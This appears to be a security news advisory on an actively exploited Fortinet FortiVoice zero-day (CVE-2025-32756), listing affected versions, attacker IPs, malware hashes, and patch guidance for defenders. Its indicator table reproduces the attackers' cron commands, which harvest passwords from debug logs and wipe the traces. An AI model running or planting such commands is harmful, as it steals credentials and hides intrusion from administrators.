Active Exploitation of FortiVoice 0-Day Enables Arbitrary Code Execution

Active Exploitation of FortiVoice 0-Day Enables Arbitrary Code Execution

Fortinet Confirms Active Exploitation of Critical 0-Day in FortiVoice and Related Systems

A severe vulnerability (CVE-2025-32756) is being actively exploited in the wild, targeting Fortinet’s FortiVoice systems. This critical flaw—rated 9.6 on the CVSS scale—can allow remote attackers to take full control of vulnerable systems without authentication, simply by sending a specially crafted HTTP request.

The issue, which stems from a stack-based buffer overflow, also affects other Fortinet products including FortiMail, FortiNDR, FortiRecorder, and FortiCamera. Fortinet confirmed that exploitation attempts were first detected against FortiVoice systems, prompting immediate investigation and patch releases.

What’s at Stake

Unlike many vulnerabilities that require user interaction or elevated privileges, CVE-2025-32756 can be triggered remotely and anonymously. This makes it especially dangerous, as attackers can seize control over devices without needing credentials or internal access.

According to Fortinet’s advisory published on May 13, 2025, successful exploitation could lead to arbitrary command or code execution, potentially enabling cybercriminals to install malware, extract data, or pivot deeper into enterprise networks.

Inside the Attack Campaign

Security teams monitoring the situation have uncovered concrete signs of exploitation. In several confirmed breaches, attackers conducted:

  • Network probing to map out connected systems
  • Log tampering, including deletion of crash logs, to cover their tracks
  • Activation of FCGI debugging, a tool abuse method used to steal credentials or monitor logins

Investigators also reported the presence of unauthorized cron jobs and modified system files aimed at data exfiltration.

Known Malicious IPs Linked to Attacks:

  • 198.105.127.124
  • 218.187.69.244
  • (4 additional IPs have been identified but not publicly disclosed)

Security teams are urged to scan for indicators of compromise (IoCs), including unexpected log entries in the httpd trace files, alterations to key configurations, and unusual process behaviors.

Observed Indicators and Attack Artifacts

CategoryIndicator / File / IPDetails & Purpose
HTTPD Log Anomaliesmod_fcgid: error reading data, FastCGI server closed connectionWarning in Apache logs showing unusual FastCGI behavior
mod_fcgid: process /migadmin/www/fcgi/admin.fe(...) exit(communication error)HTTPD trace log records a segmentation fault (signal 11), indicating process crash
Malware & Dropped Files/bin/wpad_ac_helper (MD5: 4410352e110f82eabc0bf160bec41d21)Primary malware binary deployed by attackers
/bin/busybox (MD5s: ebce43017d2cb316ea45e08374de7315, 489821c38f429a21e1ea821f8460e590)Maliciously replaced system utility
/lib/libfmlogin.so (MD5: 364929c45703a84347064e2d5de45bcd)Injected shared library used to intercept SSH credentials
/tmp/.sshdpmTemporary file storing harvested credentials
/bin/fmtest (MD5: 2c8834a52faee8d87cff7cd09c4fb946)Custom network scanning script
/var/spool/.syncTarget location for exfiltrated credentials
Modified System Files/data/etc/crontabCron task added to grep credentials from FastCGI debug logs
/var/spool/cron/crontabs/rootCron task scheduled to back up FastCGI logs
/etc/pam.d/sshdConfiguration altered to preload malicious login capture library
/etc/httpd.confInjected line to enable a SOCKS5 module
Backdoor ConfigurationFCGI Debug set to 0x80041, output directed to fileEnables high-level FastCGI logging, capturing credentials
Known Attacker IPs198.105.127.12443.228.217.17343.228.217.82156.236.76.90218.187.69.244218.187.69.59IP addresses tied to malicious activity
Suspicious Cron Jobs0 */12 * * * root busybox grep -rn passw /var/spool/crashlog/fcgi.debug > /var/spool/.sync; cat /dev/null > /var/spool/crashlog/fcgi.debugRecurring credential dump from logs, executes every 12 hours
0 */12 * * * root cat /var/spool/crashlog/fcgi.debug > /var/spool/.sync; cat /dev/null > /var/spool/crashlog/fcgi.debugLog rotation and credential capture process, also every 12 hours

Wide-Ranging Fortinet Exploit Targets Key Network Infrastructure – Urgent Patching Required

A critical security flaw has been identified across multiple Fortinet product lines, with attackers actively exploiting FortiVoice systems. This vulnerability impacts a broad swath of product versions, making swift action essential to prevent potential compromise.

Products & Versions at Risk:

  • FortiVoice: Versions 6.4.0–6.4.10, 7.0.0–7.0.6, and 7.2.0
  • FortiMail: All builds up to 7.6.2
  • FortiNDR: All 1.x releases and 7.x builds prior to 7.6.1
  • FortiRecorder: Versions through 7.2.3
  • FortiCamera: Up to version 2.1.3

Fortinet has issued updated firmware for all affected platforms. Organizations are strongly advised to upgrade immediately. For those unable to deploy patches right away, disabling the web-based (HTTP/HTTPS) administrative access can reduce exposure temporarily.

A Broader Pattern of Risk

This is not an isolated event. The vulnerability (CVE-2025-32756) adds to a growing list of high-impact flaws in Fortinet’s portfolio:

  • Early 2025: CVE-2024-55591, a critical flaw under active attack, was patched.
  • Late 2022: CVE-2022-40684, an authentication bypass, was exploited by nation-state actors including groups tied to China and Russia.

Why It Matters

Devices like FortiVoice aren’t just infrastructure—they’re communication lifelines embedded deep in enterprise networks. Their access to internal systems, voice traffic, and administrative privileges makes them a prime target for attackers seeking lateral movement or data theft.

Act Now

Organizations using any of the listed products should treat this as a high-priority threat. Applying the latest patches or temporarily disabling vulnerable services could mean the difference between a blocked attack and a full network breach.

More Articles & Posts